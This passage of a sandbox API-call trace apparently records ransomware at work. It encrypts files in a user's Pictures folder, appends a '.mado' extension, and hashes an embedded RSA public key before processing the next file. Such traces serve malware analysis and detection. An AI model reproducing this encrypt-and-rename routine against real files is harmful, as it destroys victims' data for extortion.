(HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.989] GetCurrentThreadId () returned 0x600 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0205.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0205.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799b0 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79998 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799c8 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799e0 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a10 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79998 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72db0 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72ec8 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0205.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0205.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a10 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799e0 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79980 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66c48 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.993] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x1854b, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x1854b, lpOverlapped=0x0) returned 1 [0205.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.993] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18550, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.993] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0205.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0205.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0205.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0205.994] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0205.994] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.994] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.994] CloseHandle (hObject=0x63c) returned 1 [0205.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0205.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0205.995] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\r_peyunY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\r_peyuny.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\r_peyunY.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\r_peyuny.bmp.mado")) returned 1 [0205.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.996] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0205.997] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf83f70, ftCreationTime.dwHighDateTime=0x1d5e734, ftLastAccessTime.dwLowDateTime=0x9ab22230, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0x9ab22230, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x16bea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sdMjB_rSafH1n.png", cAlternateFileName="SDMJB_~1.PNG")) returned 1 [0205.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0205.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0205.997] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\sdMjB_rSafH1n.png") returned=".png" [0205.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\sdMjB_rSafH1n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\sdmjb_rsafh1n.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.998] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=93162) returned 1 [0205.998] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.000] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16bc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.000] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.001] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.002] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x16bea, lpOverlapped=0x0) returned 1 [0206.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.003] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.003] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0206.003] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.003] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.003] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.004] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.004] GetLastError () returned 0x0 [0206.004] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.004] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0206.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.004] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.004] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.004] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16bf0) returned 0x3b81690 [0206.004] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66c48 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79980 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66c90 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799e0 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799c8 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a10 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0206.005] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0206.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a10 | out: hHeap=0x2c0000) returned 1 [0206.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79a10 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b799c8 [0206.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72c98 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.006] 